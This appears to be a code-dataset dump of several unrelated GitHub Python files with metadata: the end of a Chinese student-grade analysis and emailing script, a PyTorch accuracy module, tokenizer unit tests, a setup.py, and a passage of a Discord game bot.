'weight': 'bold', 'size': 25})\r\n plt.xticks(fontsize=18,rotation =90)\r\n plt.yticks(fontsize=12)\r\n plt.xlabel('班级', fontsize=15)\r\n plt.ylabel('标差稳定性', fontsize=17)\r\n plt.bar(x, height=y, color='darkorange',width=0.6,alpha=0.6)\r\n plt.legend(['稳定性变化','稳定性分布'])\r\n savefig('./各班语文标差成绩图.png')\r\n plt.close()\r\n #for a,b in zip(x,y):\r\n #plt.text(a, b, b, ha='center', va='bottom', fontsize=12)\r\ndef analy_stu(paths):\r\n sums =0\r\n with open(paths,'r',encoding ='utf-8',newline =\"\") as csv_file:\r\n csvs_reader =csv.DictReader(csv_file)\r\n headers =csvs_reader.fieldnames\r\n for row in csvs_reader:\r\n target_file =row['姓名']+'.csv'\r\n fil =target+row['姓名']+'/'\r\n mkdir(fil)\r\n test_list.append(fil)\r\n target_file =fil+target_file\r\n tar_list.append(target_file)\r\n sums =sums+1\r\n with open(target_file,'w',encoding ='utf-8',newline =\"\") as csv_f:\r\n csv_w =csv.DictWriter(csv_f,headers)\r\n csv_w.writeheader()\r\n csv_w.writerow(row)\r\n i=0\r\n for tar_file in tar_list[0:1]:###########\r\n f =pd.read_csv(tar_file,encoding ='utf-8')\r\n plt.figure(figsize =(15,15))\r\n xclass =f['姓名']\r\n ychinese =f[['期中语文','期末语文']]\r\n plt.plot(xclass,ychinese,linewidth =3,marker ='o',markersize =10,markerfacecolor ='w')\r\n #图表标题及字体大小\r\n plt.title('语文成绩折线图',fontsize =20)\r\n #坐标轴刻度字体\r\n plt.xticks(fontsize =15)\r\n plt.yticks(fontsize =15)\r\n plt.xlabel('姓名',fontsize =15)\r\n plt.ylabel('成绩(分)',fontsize =15)\r\n plt.legend(['期中语文','期末语文'])\r\n savefig(test_list[i]+'语文成绩折线图.png')\r\n i =i+1\r\n plt.close()\r\n ##压缩模块\r\n i =0\r\n name =[]\r\n\r\n lists =[]\r\n lest =[]\r\n for fo in test_list[0:1]:#########\r\n lists =os.listdir(fo)\r\n for x in lists:\r\n path1 =fo+lists[0]\r\n lest.append(path1)\r\n path2 =fo+lists[1]\r\n lest.append(path2)\r\n z =zip()\r\n zip_file =fo+'成绩.zip'\r\n name.append(zip_file)\r\n z.get_zip(lest,zip_file)\r\n time.sleep(2)\r\n i =i+1\r\n sums =sums-1\r\n lest =[]\r\n lists =[]\r\n print(\"{}个文件已完成,剩余{}个预计需要{}分钟\".format(i,sums,sums*3/60))\r\n\r\ndef maile(aim_account):\r\n account = input('请输入邮箱账户:')\r\n token = input('请输入邮箱授权码:')\r\n # 设置邮箱服务器,端口\r\n smtp = smtplib.SMTP_SSL('smtp.qq.com', 465)\r\n # 登录qq邮箱\r\n smtp.login(account, token)\r\n content ='本学期成绩已整理完成,现在对你的成绩单独发送'\r\n content =content+'详情见附件内容'\r\n email_content = MIMEText(content, 'plain', 'utf-8')\r\n#for tar in name:\r\n #passhttp://localhost:8888/notebooks/Untitled3.ipynb#\r\n tar ='./学生个人成绩/高健玮/成绩.zip'#########\r\n f =open(tar,'rb')\r\n # 设置附件的MIME和文件名,这里是rar类型:\r\n fil = MIMEBase('zip', 'zip', filename='成绩单.zip')\r\n # 加上必要的头信息:\r\n fil.add_header('Content-Disposition', 'attachment', filename='成绩单')\r\n fil.add_header('Content-ID', '<0>')\r\n fil.add_header('X-Attachment-Id', '0')\r\n # 把附件的内容读进来:\r\n fil.set_payload(f.read())\r\n # 用Base64编码\r\n encoders.encode_base64(fil)\r\n #添加到MIMEMultipart\r\n msg = MIMEMultipart()\r\n msg.attach(fil)\r\n f.close()\r\n msg.attach(email_content)\r\n # 设置发送者信息\r\n msg['From'] = '贾'\r\n msg['To'] = '各位同事们' \r\n msg['Subject'] = '测试'\r\n # 发送邮件\r\n smtp.sendmail(account, aim_account, msg.as_string()) \r\n # 关闭邮箱服务\r\n smtp.quit() \r\n\r\nchoice =5###学生成绩管理后期用openpyxl改进\r\nalign = Alignment(horizontal='right')\r\nwhile(choice !='0'):\r\n menu_all()\r\n choice =input(\"请输入您的选择:\")\r\n \r\n if(choice =='2'):#教师端操作\r\n menu2()\r\n choice =input('请输入您的选择:')\r\n\r\n if(choice =='1'):#学生成绩访问\r\n visit()\r\n \r\n elif(choice =='2'):#学生成绩分析\r\n print('''\r\n 1.班级总体分析\r\n 2.单位学生分析\r\n ''')\r\n choice =input(\"请输入你的选择: \")\r\n if(choice =='1'):#总体分析\r\n print(\"请打开两个xlsx表格\")\r\n #打开 期中、期末两个xlsx表格\r\n path1 =open_f()\r\n wb1 =load_workbook(path1)\r\n ws1 =wb1.active\r\n path2 =open_f()\r\n wb2 =load_workbook(path2)\r\n ws2 =wb2.active\r\n #用函数封装具体分析\r\n analyze_fun(ws1,ws2)\r\n analyze_clean()\r\n analyze_class()\r\n \r\n \r\n elif(choice =='2'):#单位学生分析\r\n analy_stu(paths)\r\n aim_account =input('请输入要发送的目标邮箱: ')\r\n maile(aim_account)\r\n \r\n elif(choice =='1'):\r\n api_c()\r\n\r\n\r\n\r\n menu_all()\r\n choice =input(\"请输入您的选择:\") \r\n", "repo_name": "JhonDavies/grade-two-design", "sub_path": "课程设计项目技术部分.py", "file_name": "课程设计项目技术部分.py", "file_ext": "py", "file_size_in_byte": 15490, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "matplotlib.pyplot.rcParams", "line_number": 28, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 35, "usage_type": "call"}, {"api_name": "zipfile.ZipFile", "line_number": 45, "usage_type": "call"}, {"api_name": "zipfile.ZIP_DEFLATED", "line_number": 45, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 49, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 51, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 57, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 87, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 94, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 134, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 144, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 155, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 171, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 179, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 183, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 195, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 239, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 253, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 262, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 271, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 275, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 275, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 276, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 281, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 281, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 283, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 283, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 284, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 284, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 285, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 285, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 286, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 286, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 287, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 287, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 288, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 289, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 289, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 292, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 293, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 293, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 298, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 298, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 299, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 299, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 301, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 301, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 302, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 302, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 303, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 303, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 304, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 304, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 305, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 305, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 306, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 306, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 307, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 308, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 308, "usage_type": "name"}, {"api_name": "csv.DictReader", "line_number": 314, "usage_type": "call"}, {"api_name": "csv.DictWriter", "line_number": 325, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 330, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 331, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 331, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 334, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 334, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 336, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 336, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 338, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 338, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 339, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 339, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 340, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 340, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 341, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 341, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 342, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 342, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 343, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 345, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 345, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 353, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 363, "usage_type": "call"}, {"api_name": "smtplib.SMTP_SSL", "line_number": 374, "usage_type": "call"}, {"api_name": "email.mime.text.MIMEText", "line_number": 379, "usage_type": "call"}, {"api_name": "email.mime.base.MIMEBase", "line_number": 385, "usage_type": "call"}, {"api_name": "email.encoders.encode_base64", "line_number": 393, "usage_type": "call"}, {"api_name": "email.encoders", "line_number": 393, "usage_type": "name"}, {"api_name": "email.mime.multipart.MIMEMultipart", "line_number": 395, "usage_type": "call"}, {"api_name": "openpyxl.styles.Alignment", "line_number": 409, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 431, "usage_type": "call"}, {"api_name": "openpyxl.load_workbook", "line_number": 434, "usage_type": "call"}]}
+{"seq_id": "29831904298", "text": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport torch.nn as nn\nimport torch\nimport numpy as np\n\n\nclass Accuracy(nn.Module):\n def __init__(self,pca_w,pca_b,cube,jointNum,batch_size,device):\n super(Accuracy, self).__init__()\n #self.criterion = nn.MSELoss()\n #self.criterion = nn.MSELoss(reduction='elementwise_mean')\n \n self.pca_w=pca_w\n self.pca_b=pca_b\n self.cube=cube\n \n self.com3d=np.zeros((batch_size,3))\n self.joints3d_gt=np.zeros((batch_size,jointNum*3))\n \n self.batch_size=batch_size\n \n self.device=device\n \n \n\n def _forward(self, output_embed, target,com3d):\n \n output_recon=torch.mm(output_embed,self.pca_w)+self.pca_b\n \n com3d_tile=np.tile(com3d,(1,21))\n com3d_tile=torch.FloatTensor(com3d_tile) \n com3d_tile= com3d_tile.to(self.device) \n output_recon=output_recon*(self.cube[2]/2.)+com3d_tile\n \n error_bag=[]\n for k in range(self.batch_size):\n error_torch1=(target[k]-output_recon[k])**2\n error_torch2=torch.sqrt(torch.sum(error_torch1.view(21*1,3),dim=1)) \n error=torch.sum(error_torch2)/(21*1)\n error_bag.append(error.item())\n \n #loss=self.criterion(output,target)\n #error=self.calculate_error()\n return error_bag\n #return error\n\n \n ", "repo_name": "baeckgoo/ir-hand", "sub_path": "loss/accuracy.py", "file_name": "accuracy.py", "file_ext": "py", "file_size_in_byte": 1547, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.nn.Module", "line_number": 10, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.FloatTensor", "line_number": 34, "usage_type": "call"}, {"api_name": "torch.sqrt", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 42, "usage_type": "call"}]}
+{"seq_id": "7059039490", "text": "import os\nimport unittest\n\nfrom lxml import etree\n\nfrom src.preprocess.tokenizer import get_root, read_aquaint, read_aquaint2, read_tac, get_date, tokenizer, write_output, \\\n read_by_corpus_type\n\nparser = etree.XMLParser(resolve_entities=False, no_network=True, recover=True)\n\nmaster_headline = \"\\\"One-in-100-year flood event\\\" devastates Western Australia\"\nmaster_body = [\n \"Test, Test (WIKINEWS) _ Aerial evacuations took place and food was airlifted in yesterday after a \"\n \"devastating flood Western Australia emergency services minister Stephen Dawson called the 'worst in a \"\n \"century' isolated communities in the Kimberley.\",\n 'Flooding began last week after heavy rain from Tropical Cyclone Ellie swelled local rivers, bolstered by '\n 'La Niña. Notably, the Fitzroy River broke a 2002 record of 13.95 meters (45.8 ft), reaching a water '\n 'level of 15.81 meters (51.9 ft) on Wednesday, according to a Bureau of Meteorology spokesperson.',\n 'Authorities estimate it could take months']\ntemp = \"temp.txt\"\n\n\nclass TestTokenizer(unittest.TestCase):\n def test_get_root(self):\n root = get_root(\"../snip/tac.sgm\")\n headline = root.find(\"DOC\").find(\"BODY\").find(\"HEADLINE\").text.strip().replace('\\n', ' ')\n self.assertEqual(headline, master_headline)\n\n def test_read_aquaint(self):\n root = get_root(\"../snip/aquaint.xml\")\n headline, body = read_aquaint(root, \"APW19980602.0004\")\n self.assertEqual(headline, master_headline)\n self.assertEqual(body, master_body)\n\n def test_read_aquaint2(self):\n root = get_root(\"../snip/aquaint2.xml\")\n headline, body = read_aquaint2(root, \"APW_ENG_19980602.0002\")\n self.assertEqual(headline, master_headline)\n self.assertEqual(body, master_body)\n\n def test_read_tac(self):\n root = get_root(\"../snip/tac.sgm\")\n headline, body = read_tac(root)\n self.assertEqual(headline, master_headline)\n self.assertEqual(body, master_body)\n\n def test_get_data(self):\n self.assertEqual(get_date(\"APW19980602.1383\"), \"19980602\")\n self.assertEqual(get_date(\"APW_ENG_20041007.0256\"), \"20041007\")\n self.assertEqual(get_date(\"AFP_ENG_20061002.0523\"), \"20061002\")\n\n def test_tokenizer(self):\n result = tokenizer(\"Authorities estimate it could take months\")\n self.assertEqual(len(result), 6)\n self.assertEqual(result[2], \"it\")\n\n def check_two_txt(self):\n with open(temp) as test, open('../snip/gold.txt') as gold:\n for line1, line2 in zip(test, gold):\n self.assertEqual(line1, line2)\n os.remove(temp)\n\n def test_write_output(self):\n output = open(temp, \"w+\")\n date = \"19980602\"\n write_output(output, 1, date, master_headline, master_body)\n self.check_two_txt()\n\n def test_read_by_corpus_type(self):\n read_by_corpus_type(\"../snip/aquaint.xml\", \"APW19980602.0004\", 1, 1, temp)\n self.check_two_txt()\n read_by_corpus_type(\"../snip/aquaint2.xml\", \"APW_ENG_19980602.0002\", 1, 2, temp)\n self.check_two_txt()\n read_by_corpus_type(\"../snip/tac.sgm\", \"AFP_ENG_19980602.0149\", 1, 3, temp)\n self.check_two_txt()\n\n\nif __name__ == '__main__':\n unittest.main()", "repo_name": "LING-575-Summarization/Summarization", "sub_path": "src/tests/tokenizer_test.py", "file_name": "tokenizer_test.py", "file_ext": "py", "file_size_in_byte": 3267, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "lxml.etree.XMLParser", "line_number": 9, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 9, "usage_type": "name"}, {"api_name": "unittest.TestCase", "line_number": 23, "usage_type": "attribute"}, {"api_name": "src.preprocess.tokenizer.get_root", "line_number": 25, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.get_root", "line_number": 30, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.read_aquaint", "line_number": 31, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.get_root", "line_number": 36, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.read_aquaint2", "line_number": 37, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.get_root", "line_number": 42, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.read_tac", "line_number": 43, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.get_date", "line_number": 48, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.get_date", "line_number": 49, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.get_date", "line_number": 50, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.tokenizer", "line_number": 53, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 61, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.write_output", "line_number": 66, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.read_by_corpus_type", "line_number": 70, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.read_by_corpus_type", "line_number": 72, "usage_type": "call"}, {"api_name": "src.preprocess.tokenizer.read_by_corpus_type", "line_number": 74, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 79, "usage_type": "call"}]}
+{"seq_id": "10250783584", "text": "import os, sys\n\nfrom setuptools import setup\n\nlong_description = open(\"README.rst\").read()\ndef main():\n setup(\n name='fsredis',\n description='fsredis: in-process redis api, persisting to file system.',\n long_description = long_description,\n version=\"0.4\",\n url='http://github.com/hpk42/fsredis',\n license='MIT license',\n platforms=['unix', 'linux', 'osx', 'cygwin', 'win32'],\n author='holger krekel',\n author_email='holger at merlinux.eu',\n classifiers=['Development Status :: 3 - Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: POSIX',\n 'Operating System :: Microsoft :: Windows',\n 'Operating System :: MacOS :: MacOS X',\n 'Topic :: Utilities',\n 'Intended Audience :: Developers',\n 'Programming Language :: Python'],\n py_modules = ['fsredis', \"test_fsredis\"],\n )\n\nif __name__ == '__main__':\n main()\n\n", "repo_name": "hpk42/fsredis", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1108, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "31", "api": [{"api_name": "setuptools.setup", "line_number": 7, "usage_type": "call"}]}
+{"seq_id": "42352869681", "text": "from discord.ext import commands\nimport discord\nimport logging\nimport SecretManager\nfrom main import Attributes\nimport main as db\nfrom typing import Optional\nimport HelpfileReader\nimport bot_admin\nimport Attributes\n\ndebug_mode = True\n\nresearch_cache = {}\nPREFIX = \"?\"\nbot = commands.Bot(\n command_prefix=commands.when_mentioned_or(PREFIX)\n)\n\nbot.help_command = None\n\n\n@bot.command(alias=['agpl', 'gpl', 'legal'])\nasync def license(ctx):\n await ctx.send(\"This bot is available under the AGPL license, and the source code can be found at \")\n return\n\n@bot.command()\nasync def join(ctx, name: str, *, must_be_none: Optional[str]):\n if name.casefold() in {'me', 'my'}:\n await ctx.send(\"Sorry, player name cannot be a special word\")\n if must_be_none is not None:\n await ctx.send(\"Sorry, player name must be a single word\")\n return\n result = db.create_player(name, ctx.author.id)\n await ctx.send(result[1])\n return\n\n\n@bot.command()\nasync def send(ctx, name:str, amount:int):\n sender_id = db.get_player_id_from_context(ctx)\n receiver_id = db.get_player_by_name(name, db.get_game_id_from_context(ctx))\n results = db.send_power(sender_id, receiver_id, amount)\n await ctx.send(results[1])\n return\n\n\n@bot.command()\nasync def pantheon(ctx, first:str, second:str):\n def check_author(author):\n def inner_check(message):\n if message.author.id != author.id:\n return False\n return True\n return inner_check\n player_id = db.get_player_id_from_context(ctx)\n if first == \"create\":\n if db.player_get_pantheon(player_id) != -1:\n await ctx.send(\"You must leave your current pantheon before you can create a new one.\")\n return\n \n name = second\n await ctx.send(\"Please enter the description.\")\n description = await bot.wait_for('message', timeout=30.0, check=check_author(ctx.author))\n description = description.content\n results = db.create_pantheon(name, description)\n db.join_pantheon(ctx.author.id, db.get_pantheon_by_name(name))\n await ctx.send(results[1])\n return\n elif first == \"leave\":\n from user_interaction import user_react_on_message\n output = \"> Are you sure you want to leave your pantheon?\\n> \" \\\n \":thumbsup: Yes\\n> \" \\\n \":thumbsdown: No\"\n do_leave = await user_react_on_message(bot, ctx, output, ctx.author, {\n '\\N{THUMBS UP SIGN}': True,\n '\\N{THUMBS DOWN SIGN}': False,\n })\n\n if do_leave:\n results = db.leave_pantheon(ctx.author.id)\n await ctx.send(results[1])\n return\n else:\n await ctx.send(\"Canceled.\")\n return\n\n\n@bot.command()\nasync def admin(ctx, *args):\n discord_id = ctx.author.id\n if len(args) == 0:\n await ctx.send(HelpfileReader.read(PREFIX, ('admin',)))\n return\n if db.context_grants_admin(ctx):\n if args[0] == 'tech':\n await bot_admin.tech(bot, ctx, *(args[1:]))\n elif args[0] == 'user':\n await bot_admin.user(bot, ctx, *(args[1:]))\n elif args[0] == \"newturn\":\n await bot_admin.newturn(bot, ctx)\n elif args[0] == 'kill':\n await bot_admin.kill(bot, ctx)\n elif args[0] == 'help':\n await bot_admin.help(bot, ctx, *(args[1:]))\n elif args[0] == 'pantheon':\n await bot_admin.pantheon(bot, ctx, *(args[1:]))\n elif args[0] == 'update':\n await bot_admin.update()\n elif args[0] == 'join':\n await bot_admin.join(bot, ctx, *(args[1:]))\n else:\n await ctx.send('Admin command does not exist')\n else:\n await ctx.send(\"You're not an admin. You cannot beat the system. Big bird is watching you.\")\n return\n\n\n@bot.command()\nasync def info(ctx, name:str = None, info_type:str = None):\n import formatting\n game_id = db.get_game_id_from_context(ctx)\n if name is None:\n output = \"> **Current game:**\\n> \\n> \"\n for base_name in db.get_player_names(game_id):\n player_id = db.get_player_by_name(base_name, game_id)\n display_name = db.get_display_name(player_id)\n output += \"**{name}**:\\n> \" \\\n \"DP: {power:.0f}\\n> \" \\\n \"Functionaries: {funcs:.0f}\\n> \" \\\n \"Personal Soldiers: {soldiers:.0f}\\n> \" \\\n \"Total Soldiers: {total_soldiers:.0f}\\n\" \\\n \"Priests: {priests:.0f}\\n> \\n> \".format(name=display_name,power=db.get_attribute(player_id, Attributes.POWER),\n funcs=db.get_attribute(player_id, Attributes.FUNCTIONARIES),\n soldiers=db.get_attribute(player_id, Attributes.SOLDIERS),\n total_soldiers=db.get_army(player_id),\n priests=db.get_attribute(player_id, Attributes.PRIESTS))\n output += \"Current turn: {turn:.0f}\".format(turn=db.current_turn(db.get_game_id_from_context(ctx)))\n await ctx.send(output)\n return\n\n player_id = None\n if name.casefold() == \"me\":\n player_id = db.get_player_id_from_context(ctx)\n else:\n player_id = db.get_player_by_name(name, db.get_game_id_from_context(ctx))\n \n if player_id is None:\n await ctx.send('Player {name} does not exist'.format(name=name))\n return\n\n info = db.get_player(player_id)\n if info_type is None:\n output_text = formatting.default_info(info, player_id)\n await ctx.send(output_text)\n return\n elif info_type == \"income\":\n output_text = formatting.income_info(info, player_id)\n await ctx.send(output_text)\n return\n elif info_type == \"war\":\n output_text = formatting.war_info(info, player_id)\n await ctx.send(output_text)\n return\n elif info_type == \"conversion\":\n output_text = formatting.conversion_info(info, player_id)\n await ctx.send(output_text)\n return\n elif info_type == \"research\":\n output_text = formatting.research_info(info, player_id)\n await ctx.send(output_text)\n return\n elif info_type == \"tech\":\n output_text = \"**{name}'s tech:**\".format(name=info[\"display_name\"])\n for tech_id in db.get_player_techs(player_id):\n output_text += \"\\n> \\n> {name}:\\n> \"\\\n \"*{description}*\".format(name=db.get_tech_name(tech_id),description=db.get_tech_description(tech_id))\n await ctx.send(output_text)\n return\n elif info_type == \"all\":\n await ctx.send(\"**{name}'s attributes:**\".format(name=info[\"display_name\"]))\n attributes_per_print = 20 # avoid 2000 character limit\n attributes = db.get_player_attributes(player_id)\n sliced = [attributes[i * attributes_per_print:(i + 1) * attributes_per_print] for i in range((len(attributes) + attributes_per_print - 1) // attributes_per_print)]\n for sublist in sliced:\n output_text = \"\"\n for attribute in sublist:\n output_text += \"\\n{name}: {value}\".format(name=attribute[0],value=attribute[1])\n await ctx.send(output_text)\n\n return\n\n\n@bot.command()\nasync def buff(ctx,name:str, attribute:str, amount:int = 1):\n from user_interaction import user_react_on_message\n source_id = db.get_player_id_from_context(ctx)\n target_id = None\n if name == \"me\":\n target_id = source_id\n else:\n target_id = db.get_player_by_name(name, db.get_game_id_from_context(ctx))\n try:\n attribute_id = db.get_attribute_id(attribute)\n except:\n await ctx.send(\"Incorrect attribute.\")\n return\n\n if db.get_army(target_id) > 0:\n cost = db.get_buff_cost(target_id, amount)\n output = f\"> You are attempting to buff {attribute} by {amount}. This will cost you {cost} DP.\\n> \" \\\n f\"Do you wish to continue?\\n> \" \\\n f\":thumbsup: Yes\\n> \" \\\n f\":thumbsdown: No\"\n do_buff = await user_react_on_message(bot, ctx, output, ctx.author, {\n '\\N{THUMBS UP SIGN}': True,\n '\\N{THUMBS DOWN SIGN}': False,\n })\n\n if do_buff:\n results = db.cast_buff(source_id, attribute_id, amount, target_id)\n await ctx.send(results[1])\n return\n\n else:\n await ctx.send(\"Canceled.\")\n return\n else:\n await ctx.send(\"The target has no soldiers to buff.\")\n return\n\n\n@bot.command()\nasync def create(ctx,amount:int, type:str):\n if amount > 0:\n player_id = db.get_player_id_from_context(ctx)\n from user_interaction import user_react_on_message\n if type in [\"priests\", \"priest\"]:\n output = \"> You are creating {num:.0f} priests at a cost of {cost:.0f} per priest, for \" \\\n \"a total of {total:.0f} DP.\" \\\n \"Do you wish to continue?\\n> \\n> \" \\\n \":thumbsup: Yes\\n> \" \\\n \":thumbsdown: No\".format(num=amount,cost=db.get_attribute(player_id,Attributes.PRIEST_COST),\n total=amount*db.get_attribute(player_id,Attributes.PRIEST_COST))\n do_create = await user_react_on_message(bot, ctx, output, ctx.author, {\n '\\N{THUMBS UP SIGN}': True,\n '\\N{THUMBS DOWN SIGN}': False,\n })\n\n if do_create:\n results = db.recruit_priests(player_id,amount)\n await ctx.send(results[1])\n return\n\n else:\n await ctx.send(\"Canceled.\")\n return\n\n elif type in [\"soldiers\", \"soldier\", \"troops\"]:\n output = \"> You are creating {num:.0f} soldiers at a cost of {cost:.0f} per soldier, for \" \\\n \"a total of {total:.0f} DP.\" \\\n \"Do you wish to continue?\\n> \\n> \" \\\n \":thumbsup: Yes\\n> \" \\\n \":thumbsdown: No\".format(num=amount, cost=db.get_attribute(player_id, Attributes.SOLDIER_COST),\n total=amount * db.get_attribute(player_id, Attributes.SOLDIER_COST))\n\n do_create = await user_react_on_message(bot, ctx, output, ctx.author, {\n '\\N{THUMBS UP SIGN}': True,\n '\\N{THUMBS DOWN SIGN}': False,\n })\n if do_create:\n results = db.recruit_soldiers(player_id, amount)\n await ctx.send(results[1])\n return\n else:\n await ctx.send(\"Canceled.\")\n return\n else:\n await ctx.send(\"Incorrect type.\")\n return\n else:\n await ctx.send(\"> Nice try.\")\n return\n\n@bot.command()\nasync def disband(ctx,amount:int):\n if amount > 0:\n player_id = db.get_player_id_from_context(ctx)\n from user_interaction import user_react_on_message\n output = 